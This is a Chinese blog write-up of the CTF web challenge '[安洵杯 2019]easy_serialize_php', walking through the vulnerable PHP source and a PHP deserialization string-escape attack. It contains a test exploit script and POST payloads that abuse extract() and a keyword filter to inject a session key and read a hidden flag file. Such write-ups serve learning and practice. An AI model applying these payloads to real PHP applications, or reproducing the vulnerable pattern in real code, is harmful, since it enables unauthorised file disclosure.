[安洵杯 2019]easy_serialize_php

于 2024-07-21 21:28:45 发布
阅读量424 收藏 3
点赞数 14
分类专栏: BUUctf web 文章标签: php android 开发语言 web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140592876
版权

进入界面然后
在这里插入图片描述

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
这就是个正则

if($_SESSION){
    unset($_SESSION);   销毁
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);
可以直接覆盖通过POST

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));   img突破点,利用文件读取我们构造路径来读取文件内容
}

?f=phpinfo
在这里插入图片描述
可能是flag先不管

d0g3_f1ag.php

<?php

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
$_SESSION['img']='ZDBnM19mMWFnLnBocA==';


$serialize_info = filter(serialize($_SESSION));
echo $serialize_info;
先尝试能否正常序列化我们的目的是逃逸img

之前学过字符串逃逸但是又可能是不懂底层原理吧这道题卡了很久
首先反序列化

$b='a:3:{s:4:"user";s:24:"";s:8:"function";s:58:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$c='a:3:{s:4:"user";s:24:"";s:8:"function";s:58:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}';
var_dump(unserialize($c));
var_dump(unserialize($b));

就是遇到}这是结束的标志所以这里这段代码就可以看出}之后的内容直接被丢弃了,无伤大雅
本地环境是由字符替换为空,那么就会少字符
少了字符,但是反序列化是不会停止的,他会持续的往后推移吃掉所需要的字符

这是测试的exp

<?php
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

$_SESSION['user']='flagflagflagflagflagflag';
$_SESSION['function']='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}';
$_SESSION['img']='ZDBnM19mMWFnLnBocA==';

$a= filter(serialize($_SESSION));
echo $a;
$b='a:3:{s:4:"user";s:24:"";s:8:"function";s:58:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$c='a:3:{s:4:"user";s:24:"";s:8:"function";s:58:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}';
var_dump(unserialize($c));
var_dump(unserialize($b));

知道序列化格式的知道""包括的才是内容那么user此时少了24个字符就会往后面补吞24个字符

print(len('";s:8:"function";s:58:"a'));

在这里插入图片描述
欸那么为什么要加一个属性呢,这里回到最开始的测试,题目本身自带了user和function,而获取flag还要有img,所以有三个属性,才能正常反序列化,少了一个当然不行

在这里插入图片描述
传参也有讲究这样子才能识别

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"1";s:1:"2";}

在这里插入图片描述
在这里插入图片描述
刚好20个不用重新构造

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"1";s:1:"2";}
baozongwi
关注
专栏目录
[安洵 2019]easy_serialize_php 1
plant1234的博客
06-03 578
首先打开题目根据提示得到源码: 对代码进行审计 发现我们能利用的点就是: 这文件读取,但我们要读什么呢?根据提示看一下phpinfo发现可以读取的文件: 回到源码继续审计,要利用文件读取必修绕过这个是在extract()对数组赋值之后进行的赋值 我们传入$_SESSION数组可以覆盖前面的值 但是不能覆盖这里img的值发现有过滤字符替换为空: 可以利用字符逃逸 首先构造数组反序列化:可以看到,我们要把function的值溢出来作为数组的值, 就可以通过user的值的长度来把:";s:8:“function
[wp][安洵 2019]easy_serialize_php
小飒的博客
07-05 145
[安洵 2019]easy_serialize_php f=phpinfo 得到 d0g3_f1ag.php ZDBnM19mMWFnLnBocA==在get ?f=show_image下 随便赋值 echo一下序列化 需要吞掉这一段 我一开始构造 _SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;} 发现不行,对比网上别人的payload发现必须function这
easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1765
0x01、Web 1.easy_serialize_php-[安洵 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
BUUCTF:[安洵 2019]easy_serialize_php
末初的CSDN博客
03-03 1009
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值